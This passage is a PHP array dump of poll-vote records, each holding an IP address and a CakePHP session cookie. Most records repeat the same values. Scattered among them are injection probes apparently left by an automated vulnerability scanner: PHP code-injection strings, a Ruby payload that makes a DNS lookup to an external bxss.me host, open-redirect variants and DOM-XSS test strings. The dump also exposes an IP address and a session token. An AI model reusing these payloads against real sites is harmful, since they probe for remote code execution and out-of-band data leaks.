'id' => '5649',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5107 => array(
'id' => '5650',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5108 => array(
'id' => '5651',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5109 => array(
'id' => '5652',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5110 => array(
'id' => '5653',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5111 => array(
'id' => '5654',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5112 => array(
'id' => '5655',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5113 => array(
'id' => '5656',
'ip' => '194.34.233.72',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(116).concat(66).concat(119).concat(72)+(require'socket'
Socket.gethostbyname('hitdn'+'zgyazeph142c0.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 5114 => array(
'id' => '5657',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5115 => array(
'id' => '5658',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5116 => array(
'id' => '5659',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5117 => array(
'id' => '5660',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5118 => array(
'id' => '5661',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5119 => array(
'id' => '5662',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5120 => array(
'id' => '5663',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5121 => array(
'id' => '5664',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5122 => array(
'id' => '5665',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5123 => array(
'id' => '5666',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5124 => array(
'id' => '5667',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5125 => array(
'id' => '5668',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5126 => array(
'id' => '5669',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5127 => array(
'id' => '5670',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5128 => array(
'id' => '5671',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5129 => array(
'id' => '5672',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5130 => array(
'id' => '5673',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5131 => array(
'id' => '5674',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5132 => array(
'id' => '5675',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5133 => array(
'id' => '5676',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5134 => array(
'id' => '5677',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5135 => array(
'id' => '5678',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5136 => array(
'id' => '5679',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5137 => array(
'id' => '5680',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5138 => array(
'id' => '5681',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5139 => array(
'id' => '5682',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5140 => array(
'id' => '5683',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5141 => array(
'id' => '5684',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5142 => array(
'id' => '5685',
'ip' => 'scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5143 => array(
'id' => '5686',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5144 => array(
'id' => '5687',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5145 => array(
'id' => '5688',
'ip' => 'scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5146 => array(
'id' => '5689',
'ip' => '194.34.233.72',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 5147 => array(
'id' => '5690',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5148 => array(
'id' => '5691',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5149 => array(
'id' => '5692',
'ip' => '194.34.233.72',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 5150 => array(
'id' => '5693',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5151 => array(
'id' => '5694',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5152 => array(
'id' => '5695',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5153 => array(
'id' => '5696',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5154 => array(
'id' => '5697',
'ip' => '194.34.233.72',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 5155 => array(
'id' => '5698',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5156 => array(
'id' => '5699',
'ip' => '194.34.233.72',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 5157 => array(
'id' => '5700',
'ip' => 'bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5158 => array(
'id' => '5701',
'ip' => '194.34.233.72',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 5159 => array(
'id' => '5702',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5160 => array(
'id' => '5703',
'ip' => 'bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5161 => array(
'id' => '5704',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5162 => array(
'id' => '5705',
'ip' => '//bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5163 => array(
'id' => '5706',
'ip' => '194.34.233.72',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 5164 => array(
'id' => '5707',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5165 => array(
'id' => '5708',
'ip' => '//scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5166 => array(
'id' => '5709',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5167 => array(
'id' => '5710',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5168 => array(
'id' => '5711',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5169 => array(
'id' => '5712',
'ip' => '//scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5170 => array(
'id' => '5713',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5171 => array(
'id' => '5714',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5172 => array(
'id' => '5715',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5173 => array(
'id' => '5716',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5174 => array(
'id' => '5717',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5175 => array(
'id' => '5718',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5176 => array(
'id' => '5719',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5177 => array(
'id' => '5720',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5178 => array(
'id' => '5721',
'ip' => '//bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5179 => array(
'id' => '5722',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5180 => array(
'id' => '5723',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5181 => array(
'id' => '5724',
'ip' => '//bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5182 => array(
'id' => '5725',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5183 => array(
'id' => '5726',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5184 => array(
'id' => '5727',
'ip' => 'http:bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5185 => array(
'id' => '5728',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5186 => array(
'id' => '5729',
'ip' => 'http:bxss.me/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5187 => array(
'id' => '5730',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5188 => array(
'id' => '5731',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5189 => array(
'id' => '5732',
'ip' => 'http:bxss.me/\',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5190 => array(
'id' => '5733',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5191 => array(
'id' => '5734',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5192 => array(
'id' => '5735',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5193 => array(
'id' => '5736',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5194 => array(
'id' => '5737',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5195 => array(
'id' => '5738',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5196 => array(
'id' => '5739',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5197 => array(
'id' => '5740',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5198 => array(
'id' => '5741',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5199 => array(
'id' => '5742',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5200 => array(
'id' => '5743',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5201 => array(
'id' => '5744',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5202 => array(
'id' => '5745',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5203 => array(
'id' => '5746',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5204 => array(
'id' => '5747',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5205 => array(
'id' => '5748',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5206 => array(
'id' => '5749',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5207 => array(
'id' => '5750',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5208 => array(
'id' => '5751',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5209 => array(
'id' => '5752',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5210 => array(
'id' => '5753',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5211 => array(
'id' => '5754',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5212 => array(
'id' => '5755',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5213 => array(
'id' => '5756',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5214 => array(
'id' => '5757',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5215 => array(
'id' => '5758',
'ip' => 'https:\\bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5216 => array(
'id' => '5759',
'ip' => 'https:\\bxss.me/',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5217 => array(
'id' => '5760',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5218 => array(
'id' => '5761',
'ip' => 'https:\\bxss.me/\',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5219 => array(
'id' => '5762',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5220 => array(
'id' => '5763',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5221 => array(
'id' => '5764',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5222 => array(
'id' => '5765',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5223 => array(
'id' => '5766',
'ip' => '/\bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5224 => array(
'id' => '5767',
'ip' => '/\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5225 => array(
'id' => '5768',
'ip' => '/\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5226 => array(
'id' => '5769',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5227 => array(
'id' => '5770',
'ip' => '/\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5228 => array(
'id' => '5771',
'ip' => '/\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5229 => array(
'id' => '5772',
'ip' => '/\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5230 => array(
'id' => '5773',
'ip' => '/\/bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5231 => array(
'id' => '5774',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5232 => array(
'id' => '5775',
'ip' => '/\/scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5233 => array(
'id' => '5776',
'ip' => '/\/scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5234 => array(
'id' => '5777',
'ip' => '/\/bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5235 => array(
'id' => '5778',
'ip' => '/\/bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5236 => array(
'id' => '5779',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5237 => array(
'id' => '5780',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5238 => array(
'id' => '5781',
'ip' => '\\bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5239 => array(
'id' => '5782',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5240 => array(
'id' => '5783',
'ip' => '\\scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5241 => array(
'id' => '5784',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5242 => array(
'id' => '5785',
'ip' => '\\scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5243 => array(
'id' => '5786',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5244 => array(
'id' => '5787',
'ip' => '\\bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5245 => array(
'id' => '5788',
'ip' => '\\bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5246 => array(
'id' => '5789',
'ip' => '\\bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5247 => array(
'id' => '5790',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5248 => array(
'id' => '5791',
'ip' => '194.34.233.72',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 5249 => array(
'id' => '5792',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5250 => array(
'id' => '5793',
'ip' => '194.34.233.72',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 5251 => array(
'id' => '5794',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5252 => array(
'id' => '5795',
'ip' => '194.34.233.72',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 5253 => array(
'id' => '5796',
'ip' => '194.34.233.72',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 5254 => array(
'id' => '5797',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5255 => array(
'id' => '5798',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5256 => array(
'id' => '5799',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5257 => array(
'id' => '5800',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5258 => array(
'id' => '5801',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5259 => array(
'id' => '5802',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5260 => array(
'id' => '5803',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5261 => array(
'id' => '5804',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5262 => array(
'id' => '5805',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5263 => array(
'id' => '5806',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5264 => array(
'id' => '5807',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5265 => array(
'id' => '5808',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5266 => array(
'id' => '5809',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5267 => array(
'id' => '5810',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5268 => array(
'id' => '5811',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5269 => array(
'id' => '5812',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5270 => array(
'id' => '5813',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5271 => array(
'id' => '5814',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5272 => array(
'id' => '5815',
'ip' => '194.34.233.72',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 5273 => array(
'id' => '5816',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5274 => array(
'id' => '5817',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5275 => array(
'id' => '5818',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5276 => array(
'id' => '5819',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5277 => array(
'id' => '5820',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5278 => array(
'id' => '5821',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5279 => array(
'id' => '5822',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5280 => array(
'id' => '5823',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5281 => array(
'id' => '5824',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5282 => array(
'id' => '5825',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 5283 => array(
'id' => '5826',
'ip' => '194.34.233.72',
